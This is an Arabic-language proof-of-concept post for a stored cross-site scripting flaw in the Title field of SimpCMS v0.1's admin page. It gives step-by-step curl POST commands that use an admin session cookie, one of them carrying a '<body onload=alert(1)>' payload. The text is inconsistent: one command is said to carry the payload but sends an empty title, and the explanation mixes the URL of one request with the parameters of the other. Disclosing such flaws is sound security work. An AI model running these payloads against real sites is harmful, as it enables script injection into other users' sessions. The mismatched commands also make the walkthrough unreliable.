
منشور عن Cross Site Scripting (XSS) في SimpCMS v0.1 - /SimpCMS/admin.php
ثغرة برمجية من نوع Cross-Site Scripting (XSS) في SimpCMS v0.1 تسمح للمهاجمين بتنفيذ نصوص برمجية تعسفية أو HTML عبر حمولة مصممة يتم حقنها في حقل العنوان (Title) في /admin.php.
بعد تسجيل الدخول إلى واجهة المشرف في SimpCMS، قم بنسخ قيم ملفات تعريف الارتباط (Cookie) الخاصة بك والتي تظهر في تبويب Application في أداة Inspect في المتصفح، ثم أرسل طلب curl التالي:
curl -X POST "http://site.com/SimpCMS/admin/index.php" -d "title=&abbrev=random&newSector=" -b "PHPSESSID=c4v4tjh5fpv4po3k5dp5mrb8r0"


المعلمات الأولية التي تم رصدها لبرنامج SimpCMS أدت إلى أمر cURL التالي ولكن تم تحديثها لاحقًا:
curl -X POST "http://site.com/SimpCMS/admin.php" -d "title=%3Cbody+onload%3Dalert%281%29%3E&text=ee&cat=something&main=1&submit=submit" -b "username=admin; password=PARAMVALUE"
الشرح:
- curl: أداة سطر الأوامر لنقل البيانات عبر عناوين URL.
- -X POST: يحدد طريقة الطلب المراد استخدامها (POST).
- "http://site.com/SimpCMS/admin.php": عنوان URL الذي يتم إرسال الطلب إليه.
- -d "title=&abbrev=random&newSector=" -b "PHPSESSID=c4v4tjh5fpv4po3k5dp5mrb8r0" - حمولة طلب POST.
قم بتشغيل هذا الأمر في الطرفية الخاصة بك لإرسال طلب POST مع حمولة XSS. قم بزيارة الموقع الرئيسي /SimpCMS وستظهر ثغرة XSS.